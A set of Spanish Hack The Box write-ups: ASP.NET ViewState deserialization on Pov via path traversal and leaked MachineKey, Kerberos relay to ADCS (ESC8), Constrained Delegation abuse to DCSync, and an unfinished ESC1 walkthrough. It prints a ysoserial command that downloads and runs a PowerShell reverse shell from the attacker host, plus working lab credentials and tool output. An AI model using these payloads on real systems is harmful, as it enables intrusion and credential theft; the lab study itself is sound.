para demostrar este ataque estaré atacando la maquina Pov de Hack The Box

El punto de entrada

En dev.pov.htb/portfolio/default.aspx encontré una funcionalidad de descarga de archivos. Al interceptar el request con Burp Suite vi que en el body viajaba un parámetro llamado file que el servidor usaba directamente para localizar y servir el archivo solicitado:

__EVENTTARGET=download&...&file=somefile.pdf

El problema es que el servidor no validaba ni sanitizaba ese input. Eso me permitió hacer Path Traversal — usando ..././ puedo salir del directorio donde vive la aplicación y navegar hacia cualquier parte del sistema de archivos. La secuencia ../ significa “sube un nivel en el directorio”, así que encadenando varios puedo llegar a la raíz del sistema y leer lo que quiera. En este caso apunté al web.config:

El servidor respondió con el contenido completo del archivo. Hasta aquí tengo un LFI — puedo leer archivos internos del sistema. Pero lo que encontré dentro de ese archivo es lo que convirtió un LFI en algo mucho más crítico.

web.config — Por qué es el archivo más valioso que puedes leer en ASP.NET

El web.config es el archivo de configuración central de toda aplicación ASP.NET. Contiene la configuración del runtime, cadenas de conexión a bases de datos, configuración de errores, y en este caso lo más interesante: el MachineKey.

<machineKey
  decryption="AES"
  decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43"
  validation="SHA1"
  validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
/>

Tengo dos keys y necesito entender exactamente para qué sirve cada una, porque de eso depende todo el ataque.

El MachineKey y el ViewState — cómo funciona el mecanismo que voy a explotar

Para entender por qué estas keys me dan RCE necesito explicar qué es el ViewState y cómo lo protege el MachineKey.

ASP.NET es stateless por naturaleza — cada HTTP request es independiente del anterior. Para mantener el estado de los controles de una página entre requests (qué botón estaba activo, qué valores tenía un formulario, etc.), ASP.NET serializa ese estado en un objeto .NET, lo convierte en bytes con BinaryFormatter y lo manda al cliente como un campo hidden en el HTML:

<input type="hidden" name="__VIEWSTATE" value="BASE64_AQUI" />

En cada POST que el navegador hace, ese valor regresa al servidor. El servidor lo toma, lo deserializa con BinaryFormatter y reconstruye los objetos .NET para restaurar el estado de la página.

El problema de seguridad obvio es que ese dato viaja en el cliente — cualquiera podría modificarlo. Para protegerlo existe el MachineKey, que cumple dos funciones:

validationKey con SHA1 — el servidor calcula un HMAC del ViewState usando esta key y lo adjunta. Cuando el ViewState regresa en el POST, el servidor recalcula el HMAC y lo compara. Si no coincide, el ViewState fue manipulado y lo rechaza. Esta key garantiza la integridad.

decryptionKey con AES — además de firmarlo, el servidor cifra el ViewState con esta key. El cliente recibe un blob cifrado que no puede leer ni entender. Esta key garantiza la confidencialidad.

El flujo completo de un ViewState legítimo es:

Servidor genera estado de la página
        ↓
BinaryFormatter serializa los objetos .NET → bytes
        ↓
Cifra los bytes con AES (decryptionKey)
        ↓
Calcula HMAC-SHA1 de los bytes cifrados (validationKey)
        ↓
Concatena [bytes cifrados] + [firma HMAC]
        ↓
Codifica en Base64 → campo __VIEWSTATE
        ↓
Cliente hace POST devolviendo el __VIEWSTATE
        ↓
Servidor verifica firma HMAC (validationKey) ✓
        ↓
Descifra con AES (decryptionKey) ✓
        ↓
BinaryFormatter.Deserialize() ← AQUÍ ESTÁ EL PROBLEMA

El paso de deserialización es el punto crítico. BinaryFormatter ejecuta código del objeto que está reconstruyendo durante la deserialización, antes de que la aplicación pueda inspeccionar o validar qué es ese objeto. Si el objeto contiene lógica maliciosa, esa lógica se ejecuta en el servidor.

El MachineKey existe exactamente para que nadie pueda meter un objeto malicioso en ese flujo — si no tienes las keys, no puedes generar un ViewState que el servidor acepte. Pero yo acababa de leer las keys gracias al Path Traversal.

Con el MachineKey en mi poder, puedo construir un objeto .NET malicioso, cifrarlo con AES usando la decryptionKey, firmarlo con HMAC-SHA1 usando la validationKey, codificarlo en Base64 y mandarlo como __VIEWSTATE. El servidor lo verificará, lo descifrará, y lo deserializará — ejecutando mi código.

Generando el payload con ysoserial.net

Para forjar el ViewState malicioso usé ysoserial.net, una herramienta que automatiza la construcción de payloads de deserialización para múltiples frameworks .NET.

Lo primero que hice fue generar un payload de prueba que ejecutara un ping hacia mi máquina. Antes de lanzar una reverse shell siempre verifico primero que tengo ejecución de código — el ping es la forma más limpia de confirmarlo sin levantar tanto ruido:

Qué hace cada flag y por qué es necesario

-p ViewState — el payload plugin. Le dice a ysoserial que el output no es un payload genérico sino un ViewState válido para ASP.NET, con todo el formato y estructura que el servidor espera. Sin esto el servidor rechazaría el request antes de llegar a deserializar.

-g TextFormattingRunProperties — la gadget chain. Una gadget chain es una secuencia de clases .NET completamente legítimas que, al ser deserializadas en un orden específico, producen como efecto secundario la ejecución de código arbitrario. No es código malicioso inyectado — son clases que ya existen en el sistema usadas de una forma no intencionada. TextFormattingRunProperties usa clases de Microsoft.PowerShell.Editor.dll que están disponibles en el GAC de Windows. La cadena internamente instancia un ObjectDataProvider a través de XAML que termina llamando Process.Start() con mi comando.

-c "ping -n 3 10.10.15.15" — el comando que quiero que ejecute el servidor cuando deserialice el payload.

--path="/portfolio/default.aspx" — ASP.NET incluye el path de la página en el cálculo del HMAC. Esto existe para que un ViewState generado para una página no pueda usarse en otra. Si le paso el path incorrecto, la firma que calcule ysoserial no coincidirá con lo que espera el servidor y rechazará el ViewState. Tiene que ser el path exacto del endpoint al que voy a hacer el POST.

--apppath="/" — el path raíz de la aplicación web, también incluido en el cálculo criptográfico.

--decryptionalg="AES" y --decryptionkey="..." — para que ysoserial cifre el payload con el mismo algoritmo y key que usa el servidor. El resultado tiene que ser indistinguible de un ViewState legítimo.

--validationalg="SHA1" y --validationkey="..." — para que ysoserial calcule el HMAC con las mismas keys del servidor. Si la firma no cuadra, el servidor descarta el ViewState antes de deserializarlo.

--isencrypted — le indica a ysoserial que debe cifrar el payload además de firmarlo. Esto es necesario porque el web.config tiene decryptionKey definido, lo que significa que el servidor espera recibir ViewStates cifrados. Sin este flag, ysoserial solo firmaría el payload y el servidor lo rechazaría al intentar descifrarlo.

Lo que ysoserial hace internamente con todo eso

1. Construye el objeto malicioso .NET (gadget chain TextFormattingRunProperties)
        ↓
2. Lo serializa con BinaryFormatter → bytes raw
        ↓
3. Cifra los bytes con AES usando la decryptionKey
        ↓
4. Calcula HMAC-SHA1 de los bytes cifrados usando la validationKey
           (incluyendo el path en el cálculo)
        ↓
5. Concatena [bytes cifrados] + [firma HMAC]
        ↓
6. Codifica en Base64
        ↓
Output: ViewState malicioso idéntico en estructura a uno legítimo

Verificando el RCE con ping

Puse tcpdump escuchando trazas ICMP en tun0 en mi máquina

Tomé el output de ysoserial, lo inserté en el campo __VIEWSTATE del request en Burp Suite reemplazando el valor original, y lo envié.

En tcpdump recibí los pings. El servidor tomó mi __VIEWSTATE, verificó la firma HMAC con su validationKey — válida porque usé la misma key — lo descifró con su decryptionKey — válido por la misma razón — y llamó a BinaryFormatter.Deserialize() que ejecutó la gadget chain y lanzó el ping hacia mi máquina. RCE confirmado.

De ping a reverse shell

Con el RCE confirmado, generé un nuevo payload. En lugar de un ping, el comando descarga y ejecuta un script PowerShell (r.ps1) desde mi máquina que establece la reverse shell:

ysoserial.exe -p ViewState
  -g TextFormattingRunProperties
  -c "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.15.15/r.ps1')"
  --path="/portfolio/default.aspx"
  --apppath="/"
  --decryptionalg="AES"
  --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43"
  --validationalg="SHA1"
  --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
  --isencrypted

Usé PowerShell con IEX + DownloadString en lugar de poner el payload de la shell directamente en el argumento -c porque así evito problemas de escapado de caracteres y el payload pesado no queda embebido en el ViewState — el servidor solo ejecuta una descarga HTTP hacia mi máquina y desde ahí corre el script.

Con un servidor HTTP en Kali sirviendo el r.ps1 y un listener en el puerto 443:

Inserté el nuevo payload en el __VIEWSTATE, envié el request, el servidor descargó el r.ps1 desde mi HTTP server y ejecutó la reverse shell. Recibí la conexión como pov\sfitz — el usuario bajo el que corre el pool de aplicaciones de IIS.

La cadena completa

Path Traversal en parámetro file=../../web.config
        ↓
Lectura del web.config → MachineKey expuesto
  decryptionKey: 74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43
  validationKey: 5620D3D029F914F4CDF25869D24EC2DA517435B200...
        ↓
ysoserial.net construye gadget chain TextFormattingRunProperties
  → serializada con BinaryFormatter → cifrada AES → firmada HMAC-SHA1 → Base64
        ↓
POST con __VIEWSTATE malicioso a /portfolio/default.aspx
        ↓
Servidor: verifica firma ✓ → descifra ✓ → BinaryFormatter.Deserialize()
        ↓
Gadget chain ejecuta Process.Start() → descarga r.ps1 → reverse shell
        ↓
Shell como pov\sfitz

Por qué funciona — la raíz del problema

Este ataque es posible por dos fallos independientes que al encadenarse se vuelven devastadores. El Path Traversal rompió el primer supuesto de seguridad: que el web.config y el MachineKey que contiene son inaccesibles desde fuera del servidor. La deserialización insegura de BinaryFormatter rompió el segundo: que los datos que llegan al servidor en el ViewState son seguros de procesar siempre que estén correctamente firmados y cifrados.

El MachineKey fue diseñado para que solo el servidor pueda generar ViewStates válidos, haciendo imposible meter objetos maliciosos en el flujo de deserialización. Esa garantía depende enteramente de que las keys sean secretas. El LFI destruyó ese secreto y con él colapsó toda la cadena de seguridad — lo que parecía ser solo lectura de archivos se convirtió en ejecución remota de código completa por la información específica que expuso.

Estaba atacando cicada.vl, un dominio Windows donde NTLM estaba completamente deshabilitado en el DC. El objetivo era comprometer el dominio partiendo de credenciales de un usuario sin privilegios especiales: Rosie.Powell.

Al enumerar con certipy-ad, identifiqué que la Certification Authority del dominio (cicada-DC-JPQ225-CA) tenía habilitado Web Enrollment sobre HTTP — eso es ESC8.

El problema: ESC8 normalmente se explota haciendo NTLM relay hacia el endpoint HTTP de ADCS (/certsrv/certfnsh.asp). Pero aquí NTLM estaba deshabilitado, así que el relay clásico con ntlmrelayx no era una opción. La única salida era hacer Kerberos relay.

Qué es ESC8

ESC8 es una misconfiguration de ADCS donde el endpoint de Web Enrollment (http://<CA>/certsrv/) no requiere HTTPS ni firma. Esto permite que un atacante que reciba una autenticación de la cuenta de máquina del DC pueda relayarla hacia ese endpoint y obtener un certificado como DC$.

Con ese certificado puedo:

1. Autenticarme como DC$ via PKINIT (Kerberos + certificado)
2. Extraer el hash NT del DC
3. Hacer DCSync y dumpear todos los hashes del dominio

El flujo completo:

Coerce DC → autentica hacia mí → relay a /certsrv/ → certificado DC$ → TGT DC$ → DCSync → hash Administrator

Por qué no funciona el relay NTLM clásico

En un entorno normal haría esto:

ntlmrelayx.py -t http://<CA>/certsrv/certfnsh.asp --adcs --template DomainController
petitpotam.py <mi_ip> <dc>

Pero aquí el DC tiene NTLM deshabilitado (NTLM:False en la salida de nxc). Cuando el DC intenta autenticarse a mi servidor SMB, no negocia NTLM, sino que va directo a Kerberos. El relay NTLM nunca llega a ocurrir.

La solución: Kerberos Relay

Kerberos relay se consideraba imposible durante mucho tiempo porque el AP_REQ (el mensaje de autenticación Kerberos) va dirigido a un SPN específico. Si el DC pide un ticket para cifs/miservidor, ese ticket solo vale para ese servicio. No puedo relayarlo a http://ca/certsrv/ porque el SPN no coincide y el servidor lo rechazará.

El truco para que funcione es forzar al DC a generar un ticket ya dirigido al servicio correcto. Eso se consigue manipulando cómo Windows construye el SPN.

CredMarshalTargetInfo — el corazón del ataque

Cuando Windows se conecta por SMB a un servidor, internamente llama a SecMakeSPNEx2 para construir el SPN. Esta función llama a CredMarshalTargetInfo, que toma información del destino, la serializa en Base64 y la añade al final del nombre del host.

El resultado tiene este aspecto:

cifs/DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA

Cuando el cliente ve un hostname que termina con esa cadena, llama a CredUnmarshalTargetInfo, extrae la estructura serializada del nombre, y usa solo la parte del nombre real (DC-JPQ225) como SPN para pedir el ticket Kerberos.

El resultado: el DC pide un ticket para cifs/DC-JPQ225 (la máquina real), pero se conecta físicamente al host DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA — que soy yo.

Yo recibo un AP_REQ con la identidad de DC-JPQ225$ correctamente embebida, y lo puedo relaizar a cualquier servicio que acepte Kerberos sin firma, como el endpoint HTTP de ADCS.

De dónde sale el sufijo 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA

Esta fue la pregunta clave. El sufijo es la serialización mínima de una estructura CREDENTIAL_TARGET_INFORMATIONW vacía.

Se puede generar con Frida hookando CredMarshalTargetInfo en lsass.exe con una estructura vacía:

// Frida hook → CredMarshalTargetInfo con CREDENTIAL_TARGET_INFORMATIONW vacía
// Output: 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA

Este valor es siempre el mismo porque la estructura está vacía. Es un valor estático que puedo memorizar o copiar directamente.

El formato completo del DNS record es:

<nombre_real_del_host>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA

Para mi caso:

DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA

El ataque paso a paso

Prerequisitos

• Usuario de dominio con permisos para crear DNS records (cualquier usuario autenticado puede hacerlo por defecto en AD)
• ADCS con Web Enrollment habilitado sobre HTTP (ESC8)
• Capacidad de coerce (PetitPotam, DFSCoerce, PrinterBug, etc.)

Paso 1 — Crear el DNS record malicioso

Registro un DNS record con el nombre especial que hace que el DC genere el ticket con la identidad correcta, apuntando a mi máquina:

Paso 2 — Levantar el relay

Certipy escucha en 0.0.0.0:445 esperando recibir el AP_REQ del DC.

Paso 3 — Coerce

Fuerzo al DC a autenticarse hacia mi DNS record malicioso usando PetitPotam:

El flujo interno en este momento:

1. El DC recibe la llamada EfsRpcAddUsersToFile
2. Intenta autenticarse al hostname DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
3. Windows llama a CredUnmarshalTargetInfo, extrae la estructura, determina que el SPN real es cifs/DC-JPQ225
4. El DC pide un TGS para cifs/DC-JPQ225 al KDC
5. Envía el AP_REQ a mi IP (10.10.15.15) porque el DNS record apunta ahí
6. Certipy recibe el AP_REQ con la identidad DC-JPQ225$ y lo relaiza al endpoint HTTP de ADCS

Paso 4 — Obtener el certificado

Certipy recibe la conexión, relaiza el AP_REQ a /certsrv/certfnsh.asp, y solicita un certificado usando la template DomainController en nombre de DC-JPQ225$:

Paso 5 — Autenticar con el certificado (PKINIT)

Paso 6 — DCSync

Diagrama del ataque

Atacante                    DC (cicada.vl)              ADCS (certsrv)
   |                             |                           |
   |--[1] Crear DNS record------>|                           |
   |    DC-JPQ225<sufijo> → mi IP|                           |
   |                             |                           |
   |--[2] Levantar relay en :445 |                           |
   |                             |                           |
   |--[3] PetitPotam coerce----->|                           |
   |                             |                           |
   |         [4] DC pide TGS para cifs/DC-JPQ225             |
   |         [5] DC envía AP_REQ a mi IP (DNS record)        |
   |<--[5] AP_REQ (DC-JPQ225$)---|                           |
   |                             |                           |
   |--[6] Relay AP_REQ-------------------------------------->|
   |                             |      [7] Certificado DC$  |
   |<-----------------------------------------------[7]------|
   |                             |                           |
   |--[8] PKINIT con dc-jpq225.pfx→ TGT DC$                  |
   |--[9] DCSync → hashes del dominio                        |

Notas importantes

Por qué falla certipy v5 a veces con este ataque: Certipy v5 tiene un bug donde si el AP_REQ llega sin el nombre de usuario correctamente parseado (username vacío), falla con Attribute's length must be >= 1 and <= 64, but it was 0. Esto ocurre cuando el DNS record NO tiene el sufijo CredMarshalTargetInfo correcto — el ticket llega sin la identidad de DC-JPQ225$ embebida.

Nombre del DNS record sin el sufijo especial: Si registro simplemente DC-JPQ225ATTACKER, el DC genera un ticket para cifs/DC-JPQ225ATTACKER (el nombre tal cual), no para cifs/DC-JPQ225. Certipy recibe el AP_REQ pero el campo de identidad llega vacío porque no hay una cuenta de máquina llamada DC-JPQ225ATTACKER en el dominio.

Sincronización de tiempo: Kerberos requiere que el reloj del atacante esté sincronizado con el DC (máximo 5 minutos de diferencia). Si hay problemas de autenticación, ejecutar sudo ntpdate <DC_IP> suele solucionarlo.

El DNS record persiste tras el reset de la máquina: Si la máquina HTB se resetea, el DNS record se pierde junto con toda la configuración. Hay que volver a crearlo con bloodyAD o dnstool.py antes de repetir el ataque.

Referencias

• Synacktiv — Relaying Kerberos over SMB using krbrelayx
• James Forshaw — Using Kerberos for Authentication Relay Attacks (Project Zero)
• Dirk-jan Mollema — Relaying Kerberos over DNS with krbrelayx and mitm6
• KrbRelay-SMBServer by @decoder_it

Constrained Delegation es una característica de Kerberos que permite a un objeto de AD (usuario o computadora) solicitar tickets de servicio en nombre de otro usuario, pero limitado a servicios específicos previamente configurados. A diferencia de Unconstrained Delegation donde el objeto puede impersonar a cualquier usuario hacia cualquier servicio, aquí el scope está restringido a los SPNs definidos en msDS-AllowedToDelegateTo.

El mecanismo detrás usa dos extensiones de Kerberos:

• S4U2Self — permite al objeto obtener un ticket de servicio hacia sí mismo en nombre de cualquier usuario, sin necesitar las credenciales de ese usuario
• S4U2Proxy — usa ese ticket para solicitar un ticket de servicio hacia el SPN destino configurado, impersonando al usuario elegido

Para que un objeto pueda ejecutar este flujo necesita tener el flag TRUSTED_TO_AUTH_FOR_DELEGATION en su userAccountControl y al menos un SPN configurado en msDS-AllowedToDelegateTo.

¿Cuándo es explotable?

El ataque se vuelve interesante en dos escenarios principales:

El primero es cuando ya tienes control sobre un objeto que tiene Constrained Delegation configurado — simplemente abusas de lo que ya está ahí impersonando a un usuario privilegiado hacia el SPN configurado.

El segundo, y más poderoso, es cuando tienes permisos para modificar los atributos de delegación de un objeto. Si puedes escribir sobre msDS-AllowedToDelegateTo y activar TRUSTED_TO_AUTH_FOR_DELEGATION, puedes configurar la delegación tú mismo desde cero y dirigirla hacia donde quieras.

El privilegio que habilita esto es SeEnableDelegationPrivilege — con él puedes modificar estos atributos en objetos sobre los que además tienes Full Control.

A quién impersonar

Un error común es intentar impersonar directamente a Administrator. Esto falla frecuentemente porque Administrator puede estar en el grupo Protected Users o tener el flag AccountNotDelegated, lo que hace que el KDC rechace el S4U2Proxy con KDC_ERR_BADOPTION.

La alternativa más efectiva es impersonar una machine account privilegiada — por ejemplo la machine account del DC (dc$). Las machine accounts raramente tienen esas protecciones y con un ticket CIFS del DC impersonando a dc$ tienes suficiente para ejecutar DCSync y obtener todos los hashes del dominio.

El flujo general del ataque

1. Obtener TGT del usuario con permisos
2. Cambiar password del objeto objetivo (si tienes Full Control sobre él)
3. Activar TRUSTED_TO_AUTH_FOR_DELEGATION en su userAccountControl
4. Configurar msDS-AllowedToDelegateTo con el SPN destino
5. getST → S4U2Self + S4U2Proxy impersonando la cuenta objetivo
6. Usar el ticket para DCSync o acceso directo

Demostración — Redelegate

En esta máquina el escenario fue exactamente el segundo caso: tenía permisos para configurar la delegación desde cero.

Lo que tenía con helen.frost:

• Sesión WinRM en el DC

• SeEnableDelegationPrivilege

• Full Control sobre el objeto FS01$

Paso 1 — TGT de Helen via Kerberos

Todas las operaciones de bloodyAD deben ir autenticadas con el TGT de Kerberos, no con usuario y password directamente. El DC solo acepta modificaciones de atributos sensibles como TRUSTED_TO_AUTH_FOR_DELEGATION cuando el contexto de autenticación es Kerberos con un ticket que tiene SeEnableDelegationPrivilege

┌──(kali㉿kali)-[~/Desktop/HTB/redelegate/content]
└─$ impacket-getTGT redelegate.vl/helen.frost:'newP@ssword2026' -dc-ip 10.129.234.50
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in helen.frost.ccache

┌──(kali㉿kali)-[~/Desktop/HTB/redelegate/content]
└─$ export KRB5CCNAME=helen.frost.ccache 

getTGT le pide al KDC un Ticket Granting Ticket para Helen. Este ticket es la identidad Kerberos de Helen y lo que hace que el DC acepte las modificaciones posteriores — sin él, bloodyAD autenticaría via NTLM y el DC rechazaría los cambios en atributos sensibles como TRUSTED_TO_AUTH_FOR_DELEGATION porque ese privilegio solo se evalúa correctamente en el contexto Kerberos. Con export KRB5CCNAME le digo a todas las herramientas que usen ese ccache como identidad activa.

Paso 2 — Cambiar password de FS01$

┌──(kali㉿kali)-[~/Desktop/HTB/redelegate/content]
└─$ bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" set password 'FS01$' 'Password1!'
[+] Password changed successfully!

-d especifica el dominio, -k le dice a bloodyAD que use el TGT del KRB5CCNAME activo en lugar de usuario/password, y --host apunta al DC por hostname (no IP) porque Kerberos requiere resolución de nombres. El comando cambia la password de FS01$ — como Helen tiene Full Control sobre ese objeto en AD, tiene permiso para hacerlo. Necesito conocer la password de FS01$ para poder autenticarme como esa machine account en los pasos siguientes.

Paso 3 — Activar TRUSTED_TO_AUTH_FOR_DELEGATION

┌──(kali㉿kali)-[~/Desktop/HTB/redelegate/content]
└─$ bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" add uac 'FS01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION
[-] ['TRUSTED_TO_AUTH_FOR_DELEGATION'] property flags added to FS01$'s userAccountControl

add uac modifica el atributo userAccountControl del objeto y -f TRUSTED_TO_AUTH_FOR_DELEGATION agrega ese flag específico sin tocar los demás flags existentes. Este flag es el que le dice al KDC que FS01$ está autorizado para ejecutar S4U2Self — sin él el KDC rechaza directamente cualquier intento de delegación. Solo funciona porque Helen tiene SeEnableDelegationPrivilege.

Paso 4 — Configurar msDS-AllowedToDelegateTo

┌──(kali㉿kali)-[~/Desktop/HTB/redelegate/content]
└─$ bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" set object 'FS01$' msDS-AllowedToDelegateTo -v 'cifs/dc.redelegate.vl'
[+] FS01$'s msDS-AllowedToDelegateTo has been updated

set object modifica un atributo LDAP directamente sobre el objeto FS01$, en este caso msDS-AllowedToDelegateTo. El valor cifs/dc.redelegate.vl es el SPN hacia el que FS01$ podrá delegar — básicamente le estoy diciendo al KDC “FS01$ tiene permitido obtener tickets CIFS del DC en nombre de otros usuarios”. El case importa aquí, tiene que ir en minúscula tal como está registrado en AD o el KDC no lo reconoce.

Paso 5 — S4U2Self + S4U2Proxy

┌──(kali㉿kali)-[~/Desktop/HTB/redelegate/content]
└─$ unset KRB5CCNAME

┌──(kali㉿kali)-[~/Desktop/HTB/redelegate/content]
└─$ impacket-getST redelegate.vl/'FS01$':'Password1!' \
  -spn cifs/dc.redelegate.vl \
  -impersonate dc \
  -dc-ip 10.129.234.50

Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating dc
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache

Primero hago unset KRB5CCNAME para que getST no intente usar el ticket de Helen sino que se autentique directamente como FS01$ con la password que acabamos de setear. -spn es el servicio destino hacia el que quiero el ticket, -impersonate dc es la cuenta que voy a impersonar — elijo la machine account dc$ y no Administrator porque las machine accounts no tienen protecciones contra delegación. Internamente getST ejecuta S4U2Self para obtener un ticket de FS01$ hacia sí mismo impersonando a dc$, y luego S4U2Proxy para convertir ese ticket en uno válido para cifs/dc.redelegate.vl. El resultado es un ccache con ese service ticket listo para usar.

Paso 6 — DCSync

Seteo el ccache generado en el paso anterior como identidad activa. -k le dice a secretsdump que use Kerberos, -no-pass porque la autenticación va por el ticket no por password, y -just-dc-ntlm para extraer solo los hashes NTLM via DRSUAPI — que es el protocolo de replicación de AD que usan los Domain Controllers entre sí. Como el ticket nos identifica como dc$ impersonando al DC real, tenemos permisos de replicación y podemos pedir todos los hashes del dominio. Con el hash NTLM de Administrator tenemos acceso total al DC via Pass-the-Hash.

Cuando exploto ESC1 y obtengo un .pfx como Administrator, el flujo normal es usar ese certificado para autenticarme vía Kerberos y obtener un TGT — esto se llama PKINIT (Public Key Cryptography for Initial Authentication in Kerberos).

El problema es que PKINIT no es universal. Para que funcione, el DC necesita tener configurado el servicio de autenticación por certificado, lo que implica que:

• El DC debe tener instalado y configurado AD CS con soporte explícito para smart card / certificate logon
• Debe existir un mapeo válido entre el certificado y el objeto de usuario en el directorio (vía SID o UPN)
• La CA que emitió el certificado debe ser de confianza para el KDC

En entornos donde AD CS fue desplegado de forma básica o con configuraciones mínimas, el KDC simplemente no tiene habilitado el soporte para este tipo de pre-autenticación y responde con KDC_ERR_PADATA_TYPE_NOSUPP. Esto no significa que el certificado sea inútil — significa que hay que buscar otra vía para aprovecharlo, y esa vía es autenticación LDAP con el certificado directamente, saltando Kerberos por completo.

Escenario: HTB Authority

Cuento con credenciales de svc_ldap : lDaP_1n_th3_cle4r! obtenidas previamente a través del portal PWM mal configurado. Con esto enumero AD CS y encuentro el template CorpVPN vulnerable a ESC1.

1. Enumeración del Template Vulnerable

┌──(kali㉿kali)-[~/Desktop/HTB/authority/content]
└─$ certipy-ad find -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -target AUTHORITY.HTB -dc-ip 10.129.229.56 -stdout -vulnerable
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 21 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'AUTHORITY-CA'
[*] Checking web enrollment for CA 'AUTHORITY-CA' @ 'authority.authority.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : AUTHORITY-CA
    DNS Name                            : authority.authority.htb
    Certificate Subject                 : CN=AUTHORITY-CA, DC=authority, DC=htb
    Certificate Serial Number           : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
    Certificate Validity Start          : 2023-04-24 01:46:26+00:00
    Certificate Validity End            : 2123-04-24 01:56:25+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : AUTHORITY.HTB\Administrators
      Access Rights
        ManageCa                        : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        ManageCertificates              : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Enroll                          : AUTHORITY.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CorpVPN
    Display Name                        : Corp VPN
    Certificate Authorities             : AUTHORITY-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollmentCheckUserDsCertificate
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
                                          Document Signing
                                          IP security IKE intermediate
                                          IP security use
                                          KDC Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 20 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2023-03-24T23:48:09+00:00
    Template Last Modified              : 2023-03-24T23:48:11+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AUTHORITY.HTB\Domain Computers
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : AUTHORITY.HTB\Administrator
        Full Control Principals         : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Write Owner Principals          : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Write Dacl Principals           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Write Property Enroll           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
    [+] User Enrollable Principals      : AUTHORITY.HTB\Domain Computers
    [!] Vulnerabilities
      ESC1  

Certipy identifica CorpVPN como vulnerable a ESC1. Las tres condiciones que lo hacen explotable son:

• Enrollee Supplies Subject: True → puedo especificar libremente el UPN en el SAN, lo que me permite impersonar a cualquier usuario, incluyendo Administrator
• Client Authentication: True → el certificado resultante sirve para autenticarse en el dominio
• Enrollment Rights: Domain Computers → solo cuentas de computadora pueden solicitar este template

El tercer punto es el que complica la solicitud directa con svc_ldap, ya que es una cuenta de usuario y no de computadora. Así que primero necesito crear una.

2. Crear una Cuenta de Computadora Falsa

Uso impacket-addcomputer para agregar una computadora al dominio con las credenciales de svc_ldap. Esto es posible porque por defecto en Active Directory cualquier usuario autenticado puede unir hasta 10 computadoras al dominio (atributo ms-DS-MachineAccountQuota).

Esto me da una cuenta FAKEBOX$ que sí pertenece al grupo Domain Computers y por lo tanto tiene derecho de enroll en el template CorpVPN.

3. Solicitar el Certificado como Administrator (ESC1)

